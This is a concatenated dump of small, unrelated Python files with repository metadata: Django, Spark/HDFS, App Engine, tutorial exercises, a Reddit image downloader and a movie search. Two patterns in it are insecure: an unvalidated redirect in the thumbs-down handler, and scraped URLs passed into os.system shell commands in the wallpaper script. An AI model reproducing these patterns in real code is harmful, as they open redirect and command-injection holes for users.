        "antinex_client.log"
    ],
    package_data={},
    install_requires=install_requires,
    test_suite="setup.antinex_client_test_suite",
    tests_require=[
        "pytest"
    ],
    scripts=[
        "./antinex_client/scripts/ai",
        "./antinex_client/scripts/ai_env_predict.py",
        "./antinex_client/scripts/ai_get_prepared_dataset.py",
        "./antinex_client/scripts/ai_get_job.py",
        "./antinex_client/scripts/ai_get_results.py",
        "./antinex_client/scripts/ai_prepare_dataset.py",
        "./antinex_client/scripts/ai_train_dnn.py"
    ],
    # NOTE(review): use_2to3 was removed in setuptools >= 58; this only
    # works with older setuptools — confirm before upgrading the toolchain.
    use_2to3=True,
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: Apache Software License",
        "Operating System :: OS Independent",
        "Programming Language :: Python :: 3.5",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: Implementation :: PyPy",
        "Topic :: Software Development :: Libraries :: Python Modules",
    ])
|
[
"[email protected]"
] | |
d69a39808d6f68572bc01c15f5e876462397f0eb
|
4dac40a30e7bbb86ab829fed0cb6f12ff7fa0216
|
/djwiki/wiki/models.py
|
0e7d732c83f68d3e3e9fb72063d8346168ff24ae
|
[] |
no_license
|
gzpgg3x/pythonDiary
|
cc039b716c810f99d5a12b0f4167a711cd6ea18f
|
0c3af53dc635d5ff40adad89dce146d6684e162e
|
refs/heads/master
| 2021-01-10T19:55:41.130511 | 2013-04-21T04:37:10 | 2013-04-21T04:37:10 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 201 |
py
|
from django.db import models
class Page(models.Model):
name = models.CharField(max_length=40, unique=True)
content = models.TextField()
def __unicode__(self):
return self.name
|
[
"[email protected]"
] | |
422bb18f8a7bcb7c258bbd7e723a5fffce02797e
|
d8aca998189d273c279b017fa17ed76c3f3419b6
|
/main.py
|
4f6afb25018e8bce3867c90b15f250cb8993aedf
|
[] |
no_license
|
konstantin-kotochigov/otus
|
0016a5b616b6da5b829e825a78f6c6f0c1e89595
|
57e35c415f26441015c402382962e8bceed95c33
|
refs/heads/master
| 2022-01-23T01:42:57.150184 | 2019-04-30T12:47:47 | 2019-04-30T12:47:47 | 181,729,680 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,018 |
py
|
import sys
from pyspark.sql import SparkSession
from hdfs import InsecureClient
import time
import datetime
from cj_loader import CJ_Loader
from cj_predictor import CJ_Predictor
from cj_export import CJ_Export
def main():
    """Customer-journey scoring pipeline: load CJ events from Spark,
    train/apply the return-score model, publish a delta to production
    (optionally), and append a run-metadata row to an HDFS log.

    CLI: main.py <send|nosend> <refit|norefit> <sample_rate>
    """
    if len(sys.argv) < 4:
        raise Exception("command must have 3 arguments")
    # Specifies to Merge
    send_update = True if sys.argv[1]=="send" else False
    # Overrides option to refit the model
    arg_refit = True if sys.argv[2]=="refit" else False
    # Sets sample rate
    # NOTE(review): kept as a string and currently unused (sampling code
    # below is commented out) — convert to float if re-enabled.
    arg_sample_rate = sys.argv[3]
    # send_update = True if len(sys.argv) >= 2 and (sys.argv[1]=="1") else False
    print("Send_update = {}".format(send_update))
    # Model is refit at most once per week unless forced via CLI.
    update_model_every = 60*24*7 # in seconds
    start_processing = time.time()
    # Common classes
    spark = SparkSession.builder.appName('analytical_attributes').getOrCreate()
    # Working Directories
    orgid = "21843d80-6f2c-402f-9587-9c501724c646"
    work_dir = "/data/"+orgid+"/.dmpkit/models/"
    hadoop_namenode = "http://159.69.59.101:50070"
    hdfs_client = InsecureClient(hadoop_namenode, "dmpkit")
    if "models" not in hdfs_client.list("/data/"+orgid+"/.dmpkit/"):
        hdfs_client.makedirs("/data/"+orgid+"/.dmpkit/models")
    # Check whether We Need to Refit our Model
    # NOTE(review): comment says weekly but update_model_every is 60*24*7
    # SECONDS (~7 days only if minutes were intended) — verify the unit.
    model_modification_ts = next(iter([x[1]['modificationTime'] for x in hdfs_client.list(work_dir, status=True) if x[0] == "model.pkl"]), None)
    model_needs_update = True if (model_modification_ts == None) or (time.time() - model_modification_ts > update_model_every) or (arg_refit) else False
    print("Refit = {}".format(model_needs_update))
    # Load Data: customer-journey events for the fixed date window.
    cjp = CJ_Loader(spark)
    cjp.set_organization(orgid)
    cjp.load_cj(ts_from=(2019,1,1), ts_to=(2019,1,31))
    # cjp.load_cj(ts_from=(2018,12,1), ts_to=(2018,12,31))
    # cjp.cj_stats(ts_from=(2010,12,1), ts_to=(2020,12,31))
    cjp.cj_data.createOrReplaceTempView('cj')
    cjp.extract_attributes()
    cjp.process_attributes(features_mode="seq", split_mode="all")
    data = cjp.cj_dataset
    # data.to_parquet(work_dir+"/data_export.parquet")
    # Sample Dataset to Reduce Processing Time
    # if arg_sample_rate != 1.0:
    #     (train_index, test_index) = StratifiedShuffleSplit(n_splits=1, train_size=arg_sample_rate).get_n_splits(data, data.target)
    # Make Model: optimize hyperparameters, then fit/score.
    predictor = CJ_Predictor(work_dir, hdfs_client)
    predictor.set_data(data)
    predictor.optimize(batch_size=4096)
    start_fitting = time.time()
    result = predictor.fit(update_model=model_needs_update, batch_size=4096)
    scoring_distribution = result.return_score.value_counts(sort=False)
    print("Got Result Table with Rows = {}".format(result.shape[0]))
    print("Score Distribution = \n{}".format(scoring_distribution))
    # Make Delta: map scores onto DMP attribute/taxonomy identifiers.
    df = spark.createDataFrame(result)
    dm = CJ_Export(orgid, "model_update", hadoop_namenode, "schema.avsc")
    mapping = {
        'id': {
            'fpc': {
                'primary': 10008,
                'secondary': 10031
            }
        },
        'attributes': {
            'return_score': {
                'primary': 10127,
                'mapping': {
                    '1': 10000,
                    '2': 10001,
                    '3': 10002,
                    '4': 10003,
                    '5': 10004
                }
            }
        }
    }
    # Publish Delta (only actually merged when send_update is True).
    print("Send Update To Production = {}".format(send_update))
    dm.make_delta(df, mapping, send_update=send_update)
    finish_fitting = time.time()
    # Store Run Metadata: one semicolon-separated row per pipeline run.
    log_data = [datetime.datetime.today().strftime('%Y-%m-%d %H-%m'),
                str(cjp.cj_data_rows),
                str(cjp.cj_df_rows),
                str(cjp.cj_dataset_rows),
                str(model_needs_update),
                str(send_update),
                str(round((start_fitting - start_processing)/60, 2)),
                str(round((finish_fitting - start_fitting)/60, 2)),
                str(predictor.train_auc),
                str(predictor.test_auc),
                str(predictor.test_auc_std),
                str(scoring_distribution[0]),
                str(scoring_distribution[1]),
                str(scoring_distribution[2]),
                str(scoring_distribution[3]),
                str(scoring_distribution[4])
                ]
    log = ";".join(log_data)
    log_path = work_dir+"log.csv"
    if "log.csv" not in hdfs_client.list(work_dir):
        # First run: write the CSV header followed by this row.
        data_with_header = 'dt;loaded_rows;extracted_rows;processed_rows;refit;send_to_prod;processing_time;fitting_time;train_auc;test_auc;test_auc_std;q1;q2;q3;q4;q5\n'+log + "\n"
        hdfs_client.write(log_path, data=bytes(data_with_header, encoding='utf8'), overwrite=True)
    else:
        # Append by read-modify-write (HDFS client has no append here).
        with hdfs_client.read(log_path) as reader:
            prev_log = reader.read()
        new_log = prev_log + bytes(log + "\n", encoding='utf8')
        hdfs_client.write(log_path, data=new_log, overwrite=True)
main()
|
[
"[email protected]"
] | |
5f3d4294cb56833f92b4727c486bf706a63f7707
|
ab2712490238827c3298f3dada3fd111a31da761
|
/OpenSourceBlogger/addThumbsDown.py
|
99d0c5ad9315c0779d1453c698443ddcf6f059f1
|
[] |
no_license
|
aniket10/blogging-platform
|
4da002f83da981b6527ca774eb23a424a677bcea
|
195ebce7097ddaad4210e2faa657cf9075dd6432
|
refs/heads/master
| 2016-09-07T18:48:53.279441 | 2013-12-18T18:31:49 | 2013-12-18T18:31:49 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 643 |
py
|
import cgi
import webapp2
import urlparse
from google.appengine.ext import db
from Blogs import Blogs
class addThumbsDown(webapp2.RequestHandler):
    """GAE handler: increment a blog post's thumbs-down counter, then
    redirect back to the page given in the request."""
    def get(self):
        """Handle GET /addThumbsDown?blogid=<id>&dest_url=<url>."""
        form = cgi.FieldStorage()
        blogId = form['blogid'].value
        url = form['dest_url'].value
        # sessionId = int(form['sessionId'].value)
        # Read-modify-write on the datastore entity.
        # NOTE(review): not transactional — concurrent votes can be lost;
        # also no check that the entity exists (None would raise here).
        b = Blogs.get_by_id(int(blogId))
        b.thumbsdown = b.thumbsdown + 1
        b.put()
        # SECURITY NOTE(review): dest_url is redirected to unvalidated —
        # this is an open redirect; consider validating the host.
        self.redirect(url, False, False, None, None)
self.redirect(url, False, False, None, None)
# WSGI app routing any /addThumbsDown* path to the handler above.
application = webapp2.WSGIApplication([
    ('/addThumbsDown.*',addThumbsDown)
], debug=True)
|
[
"[email protected]"
] | |
26952bdc611861509bd368811c1b243e394f7d45
|
a32049cdf8cb3403e8e54ddd661f8bb506cca99b
|
/first_project/first_app/urls.py
|
f627fd5ffdf7c929f3138c22f3c628b8dc0cf27b
|
[] |
no_license
|
akhileshvvn/django-deployment-example
|
5a3beb8205f2905c99808e983baaf0f8a7a23772
|
45317bb6166527054541e52c8a986f44342ea958
|
refs/heads/master
| 2022-04-15T08:17:02.615307 | 2020-04-11T07:54:19 | 2020-04-11T07:54:19 | 254,815,719 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 501 |
py
|
from django.urls import path,re_path
from django.conf.urls import url
from . import views
#TEMPLATE TAGGING
# Namespace used by template tags, e.g. {% url 'first_app:other' %}.
app_name = 'first_app'
urlpatterns = [
    # NOTE(review): name='' makes this route hard to reverse; also
    # r'formindex/' lacks the leading ^ the sibling patterns use — verify.
    re_path(r'^index/', views.index, name=''),
    re_path(r'formindex/',views.form_name_view,name='form_name'),
    re_path(r'^relative/$',views.relative,name = 'relative'),
    re_path(r'^other/$',views.other,name='other'),
    re_path(r'^register/$',views.register,name='register'),
    re_path(r'^user_login/$',views.user_login,name='user_login')
]
|
[
"[email protected]"
] | |
297d9dd46444739c518dba755a52553bc66bc674
|
464efb61bdf6651b2e016e68bc6766bd7dacdf79
|
/src/server/config.py
|
82bf73a6729ba154b555fe888c43baf12f8c656c
|
[] |
no_license
|
maksfourlife/transnfc_web
|
81e891eb9345c2b7e78ab15af99e043c340d3dee
|
7e110a298f4c2a9c98a38dda5c6322ac7735d46c
|
refs/heads/master
| 2023-03-14T07:16:19.508762 | 2020-04-08T13:09:22 | 2020-04-08T13:09:22 | 247,476,183 | 0 | 0 | null | 2021-03-20T03:27:32 | 2020-03-15T13:53:31 |
Python
|
UTF-8
|
Python
| false | false | 109 |
py
|
class Config:
SQLALCHEMY_DATABASE_URI = "sqlite:///server.db"
SQLALCHEMY_TRACK_MODIFICATIONS = False
|
[
"[email protected]"
] | |
d2cbc077321e6797286ece37e88d6968738be31c
|
89556ba7cd23520117010f4c7d99683fa4994bf0
|
/djangosite/contact/models.py
|
5de38890f11ccb96c91cd9024cfea9c07ada8a3f
|
[] |
no_license
|
MinHyoung/play
|
13e0b9e6e58e1e073f37b691e090115d09380bce
|
164b640709cd9319fd2eddeafb8024a07f262cc9
|
refs/heads/master
| 2021-01-17T23:56:33.805323 | 2013-11-15T17:04:16 | 2013-11-15T17:04:16 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 370 |
py
|
from django.db import models
class Contact(models.Model):
GENDER_CHOICES = (
(1, 'Male'),
(2, 'Female'),
)
subject = models.CharField(max_length=100, blank=True)
message = models.TextField(blank=True)
sender = models.EmailField(max_length=100)
gender = models.IntegerField(choices=GENDER_CHOICES)
cc = models.BooleanField()
|
[
"[email protected]"
] | |
72bc2e20ca357ce0505185fce963ff64d12a537f
|
d215516889a11f516ce7617d3b48f41b272fd23d
|
/testCases/200109-delayScenario1/sixMachineDelayStep2.py
|
498cbe8e1f986d7885612f9513f020a60d0eb87f
|
[
"MIT"
] |
permissive
|
thadhaines/PSLTDSim
|
c0b61e510afed1de03f14341230dc76b29f36440
|
1bc598f3733c1369c164f54249e5f7757e6bf466
|
refs/heads/master
| 2021-08-17T15:33:35.881354 | 2020-05-01T10:00:51 | 2020-05-01T10:00:51 | 173,911,705 | 0 | 0 |
MIT
| 2019-07-15T21:15:26 | 2019-03-05T09:02:07 |
Python
|
UTF-8
|
Python
| false | false | 1,484 |
py
|
# Format of required info for batch runs.
debug = 0
AMQPdebug = 0
debugTimer = 0
simNotes = """
No AGC Response (no delay)
Delay over response test
Loss of generation in area 2 at t=2
Delayed action by area 1
AGC in both areas
"""
# Simulation Parameters Dictionary
simParams = {
'timeStep': 1.0, # seconds
'endTime': 60.0*8, # seconds
'slackTol': 1, # MW
'PY3msgGroup' : 3, # number of Agent msgs per AMQP msg
'IPYmsgGroup' : 60, # number of Agent msgs per AMQP msg
'Hinput' : 0.0, # MW*sec of entire system, if !> 0.0, will be calculated in code
'Dsys' : 0.0, # Damping
'fBase' : 60.0, # System F base in Hertz
'freqEffects' : True, # w in swing equation will not be assumed 1 if true
# Mathematical Options
'integrationMethod' : 'rk45',
# Data Export Parameters
'fileDirectory' : "\\delme\\200109-delayScenario1\\", # relative path from cwd
'fileName' : 'SixMachineDelayStep2',
'exportFinalMirror': 1, # Export mirror with all data
'exportMat': 1, # if IPY: requies exportDict == 1 to work
'exportDict' : 0, # when using python 3 no need to export dicts.
'deleteInit' : 0, # Delete initialized mirror
'assumedV' : 'Vsched', # assummed voltage - either Vsched or Vinit
'logBranch' : True,
}
savPath = r"C:\LTD\pslf_systems\sixMachine\sixMachineTrips.sav"
dydPath = [r"C:\LTD\pslf_systems\sixMachine\sixMachineDelay.dyd"]
ltdPath = r".\testCases\200109-delayScenario1\sixMachineDelayStep2.ltd.py"
|
[
"[email protected]"
] | |
43d49f630d353fd008900b0b05ae5b3a0d17fd2b
|
c3a68b3e226ba4b04edff61f311a31beda8a3ac2
|
/Week2/Day5/word cloud.py
|
75fe7e6ba592ac00c97020c661c58acb4ff18a50
|
[] |
no_license
|
sgowtham36/CompetitiveProgramming
|
3fa477820c5651d4d38c96d5a7790ab74757637e
|
835a8f84b578f6421eb6d9b5111a847446117fe3
|
refs/heads/master
| 2020-03-21T12:45:08.328286 | 2018-07-21T09:23:27 | 2018-07-21T09:23:27 | 138,570,032 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,432 |
py
|
import unittest
import re
class WordCloudData(object):
def __init__(self, inp):
l = re.split('\.| |\?|\!|:|\- |, |\(|\)',inp)
d = {}
for i in l:
if i!='':
j = i.title()
if i in d:
d[i] += 1
elif j in d:
d[i] = 1+d[j]
d.pop(j, None)
else:
d[i] = 1
self.words_to_counts = d
# Test Cases
class Test(unittest.TestCase):
def test_simple_sentence(self):
input = 'I like cake'
word_cloud = WordCloudData(input)
actual = word_cloud.words_to_counts
expected = {'I': 1, 'like': 1, 'cake': 1}
self.assertEqual(actual, expected)
def test_longer_sentence(self):
input = 'Chocolate cake for dinner and pound cake for dessert'
word_cloud = WordCloudData(input)
actual = word_cloud.words_to_counts
expected = {
'and': 1,
'pound': 1,
'for': 2,
'dessert': 1,
'Chocolate': 1,
'dinner': 1,
'cake': 2,
}
self.assertEqual(actual, expected)
def test_punctuation(self):
input = 'Strawberry short cake? Yum!'
word_cloud = WordCloudData(input)
actual = word_cloud.words_to_counts
expected = {'cake': 1, 'Strawberry': 1, 'short': 1, 'Yum': 1}
self.assertEqual(actual, expected)
def test_hyphenated_words(self):
input = 'Dessert - mille-feuille cake'
word_cloud = WordCloudData(input)
actual = word_cloud.words_to_counts
expected = {'cake': 1, 'Dessert': 1, 'mille-feuille': 1}
self.assertEqual(actual, expected)
def test_ellipses_between_words(self):
input = 'Mmm...mmm...decisions...decisions'
word_cloud = WordCloudData(input)
actual = word_cloud.words_to_counts
expected = {'mmm': 2, 'decisions': 2}
self.assertEqual(actual, expected)
def test_apostrophes(self):
input = "Allie's Bakery: Sasha's Cakes"
word_cloud = WordCloudData(input)
actual = word_cloud.words_to_counts
expected = {"Bakery": 1, "Cakes": 1, "Allie's": 1, "Sasha's": 1}
self.assertEqual(actual, expected)
unittest.main(verbosity=2)
|
[
"[email protected]"
] | |
9f6267ca0c70fa24732c18a22c4ecf9dfcd51a24
|
02e570630224d80217769916a35a6d662d95296c
|
/ex24.py
|
ed6ef14127c86f62596cc65b94f87136f9820ed4
|
[] |
no_license
|
nikslav/Exercises-LPTHW
|
c2cd6e17b8843f5d9b90f804bb5dcbe2f1471047
|
06038a4245f01f58f6a04f20b6e6a38c7329376c
|
refs/heads/master
| 2021-05-16T03:19:38.716460 | 2020-02-12T21:59:11 | 2020-02-12T21:59:11 | 31,510,230 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 798 |
py
|
print "Let's practice everything."
print 'You\'d need to know \'bout escapes with \\ that do \n newlines and \t tabs.'
poem = """
\tThe lovely world
with logic so firmly planted
cannot discern \n the needs of love
nor comprehend passion from intuition
and requires an explanation
\n\t\twhere there is none.
"""
print "------------"
print poem
print "------------"
five = 10 - 2 + 3 - 6 # = 5
print "This should be five: %s" % five
def secret_formula(started):
jelly_beans = started * 500
jars = jelly_beans / 1000
crates = jars / 100
return jelly_beans, jars, crates
start_point = 10000
beans, jars, crates = secret_formula(start_point)
start_point = start_point
print "We can also do that this way:"
print "We'd have %d beans, %d jars, and %d crates." % secret_formula(start_point)
|
[
"n*****@noreply.com"
] |
n*****@noreply.com
|
955eb6e62f585e0d1aea48906a6f34b58e43e7b7
|
9ee2ff96498a9e0cb3db7829dc9dbb3027d1ec65
|
/17 Letter Combinations of a Phone Number.py
|
8d0e1738e5cd0433eb4e7e0f6680daf9f1c97e5b
|
[] |
no_license
|
Alfredhana/Leetcode-Exercise
|
848c19caf1e3475454e210e8045eb45e48259158
|
6b48e0d7c218d59ca4e7b5deebbc634d3cde9fd8
|
refs/heads/master
| 2022-12-24T20:56:00.333978 | 2020-10-10T06:49:58 | 2020-10-10T06:49:58 | 259,835,167 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 978 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 13 11:44:46 2020
@author: USER
"""
class Solution:
def lettercombinations(self, digits):
print(digits)
phoneMap = {'2':['a', 'b', 'c'],
'3':['d', 'e', 'f'],
'4':['g', 'h', 'i'],
'5':['j', 'k', 'l'],
'6':['m', 'n', 'o'],
'7':['p', 'q', 'r', 's'],
'8':['t', 'u', 'v'],
'9':['w', 'x', 'y', 'z']}
def findcombination(digits, combination):
if len(digits) == 0:
list.append(combination)
else:
for letter in phoneMap[digits[0]]:
findcombination(digits[1:], combination + letter)
list = []
if digits:
findcombination(digits, "")
print( list)
if __name__ == '__main__':
s = Solution()
letters = "79"
print(letters)
s.lettercombinations(letters);
|
[
"[email protected]"
] | |
1d5f94ad567c571b31a903dfa7dc38b92a35aff2
|
279df61e17235e103f34fe34d4e357a0bebd4aee
|
/grabImages.py
|
48e5751e08b3da0b87935caef1f26e9131716668
|
[] |
no_license
|
codemang/RedditWallpaper
|
8b83bc9127a276795939f87e9de9c65b1798a384
|
6b251d7544891fe2803ae6fb44d249b6190a4366
|
refs/heads/master
| 2016-09-15T16:23:49.288375 | 2015-10-09T17:47:44 | 2015-10-09T17:47:44 | 29,942,900 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,769 |
py
|
import os
import re
import datetime
from datetime import timedelta
from os.path import expanduser
timeStructure = '%Y/%m/%d %H:%M:%S' # Format for date/time
timeDiff = timedelta(hours=12) # Amount of time to wait between updates
scheduleFile = '.RedditWallpaper/schedule.txt' # File where last update time is stored
def main():
global scheduleFile
scheduleFile = expanduser("~") + "/" + scheduleFile
# If nothing has been written to schedule.txt, this is the first time grabbing images
if os.stat(scheduleFile).st_size == 0:
print "Empty"
grabImages()
return
# Read the last time the images were updated
f = open(scheduleFile, 'r')
lastTimeUpdated = f.readline().rstrip('\n')
# Grab the current time and strip the decimal place following the time
curTime = datetime.datetime.now()
curTime = curTime.strftime(timeStructure)
curTime = datetime.datetime.strptime(curTime, timeStructure)
# Convert lastTimeUpdated from a string to a datetime object
lastTimeUpdated = datetime.datetime.strptime(lastTimeUpdated, timeStructure)
# If it has been more than timeDiff hours since the last update, update
if lastTimeUpdated + timeDiff < curTime:
grabImages()
return
def grabImages():
# Grab entire HTML of r/EarthPorn
os.system("curl www.reddit.com/r/EarthPorn > output.txt")
# Load HTML of r/EarthPorn into variable
f = open('output.txt', 'r')
body = f.read()
thumbnailRegex = re.compile('<a class="thumbnail.+?href="(.+?)"')
badImgurRegex = re.compile('^https?://(www.)?imgur.com/.+')
goodImgurRegex = re.compile('^https?://i.imgur.com.*')
ppcdnRegex = re.compile('^https?://ppcdn.500px.org.*')
grabImgurRegex = '^https?://(www.)?(imgur.com/.+)'
counter = 1
# For every thumbnail image in the page
for link in re.findall(thumbnailRegex, body):
# If we have already downloaded 10 images, break
if counter > 10:
break;
# If this thumbnail is not from imgur or ppcdn, try again
if not goodImgurRegex.match(link) and not badImgurRegex.match(link) and not ppcdnRegex.match(link):
continue;
if badImgurRegex.match(link):
m = re.search(grabImgurRegex, link)
link = "i." + m.group(2)+".jpg"
# Create an image name for this image and download the image
imageName = "image"+`counter`+".jpg"
command = 'curl -o '+imageName +' '+link + ' > /dev/null'
os.system(command)
# Move the image to the images directory
os.system("mv "+imageName+" ~/Desktop/RedditWallpaper/"+imageName)
counter += 1
curTime = datetime.datetime.now()
curTime = curTime.strftime(timeStructure)
f = open(scheduleFile, 'w')
f.write(curTime)
os.system("rm ./output.txt")
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
7a05ffedb2db5040001c4d20b87e94c649ca34d8
|
fa7aa574c89c282629af5a95825d88051d58eaf0
|
/py/symlinksToFiles/Link to crawler - Copy (190).py
|
80c748b849a2ed082c295ae56c8e58ca86b54fd5
|
[] |
no_license
|
ankurspadale/sampleForTest
|
52629f9039524a77a1b853894976f223331ede62
|
ca28d41e1288c7f04670133cf5c113b8dcbe0f97
|
refs/heads/master
| 2021-05-06T05:34:55.844687 | 2019-04-30T10:49:55 | 2019-04-30T10:49:55 | 115,111,347 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 56 |
py
|
/home/ankur/git/sampleForTest/py/crawler - Copy (190).py
|
[
"[email protected]"
] | |
bfe1228380b508c2747a3f62b20939b0d229ad81
|
786a3dbff1c0e211cb0fd724c8e2f7dcda205e2c
|
/Peliculas.py
|
803f6b353cf422a268dc7919d26b879618369f10
|
[] |
no_license
|
NicoRiveraR/CienciasIII
|
5d7b84b38db12443ada4cd5f5cce1c8385ad110e
|
d94ab95b557e8c8d05081b8590d848282a3dd9de
|
refs/heads/master
| 2021-01-16T19:49:14.846102 | 2017-08-22T22:41:44 | 2017-08-22T22:41:44 | 100,187,682 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,694 |
py
|
from pila import*
pPeliculas = Pila()
pBusquedas = Pila()
class Peliculas:
def __init__(self, nombre, ano, actor, genero):
self.nombre = nombre
self.ano = ano
self.actor = actor
self.genero = genero
def getGenero(self):
return self.genero
def getNombre(self):
return self.nombre
def getAno(self):
return self.ano
def getActor(self):
return self.actor
class BusquedaPeliculas:
def initPeliculas(self):
global pPeliculas
p0 = Peliculas("Love exposure", "2008", "Takahiro Nishijima", "Comedia")
p1 = Peliculas("Spiderman HomeComing", "2017", "Tom Holland", "Accion")
p2 = Peliculas("WonderWoman", "2017", "Gal Gadot", "Accion")
p3 = Peliculas("Gifted", "2017", "Chris Evans", "Drama")
p4 = Peliculas("El Conjuro", "2013", "Vera Farmiga", "Terror")
p5 = Peliculas("Ghost In The Shell", "2017", "Scarlett Johansson", "Accion")
p6 = Peliculas("Doctor Strange", "2016", "Benedict Cumberbath", "Accion")
p7 = Peliculas("Die Hard", "1989", "Bruce Willis", "Accion")
p8 = Peliculas("La Pelota de Letras", "2004", "Andres Lopez", "Comedia")
p9 = Peliculas("Ring", "1998", "Nanako Matsushima", "Terror")
allP = [p0,p1,p2,p3,p4,p5,p6,p7,p8,p9]
for x in range(0, 10):
pPeliculas.apilar(allP[x])
def busquedas(self):
global pBusquedas
pEncontradas = 0
print("Buscador de Peliculas con Pilas."+"\n")
print("Ingrese el Genero:")
genero = input() #Python 2.x raw_input(), 3.x input()
while (pPeliculas.es_vacia() == False):
aux = pPeliculas.desapilar()
if aux.getGenero() == genero:
pBusquedas.apilar(aux)
pEncontradas+=1
while (pBusquedas.es_vacia() == False):
pelicula = pBusquedas.desapilar()
print ("=========================================")
print ("Nombre: " + pelicula.getNombre() +"\n")
print ("Ano: " + pelicula.getAno() +"\n")
print ("Actor: " + pelicula.getActor() +"\n")
if(pEncontradas == 0):
print("No se encuentran peliculas de este genero." +"\n")
print("Desea realizar otra busqueda y/n")
ans = input()
if ans == "y":
self.initPeliculas()
self.busquedas()
else:
exit
class Main:
obj = BusquedaPeliculas()
obj.initPeliculas()
obj.busquedas()
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.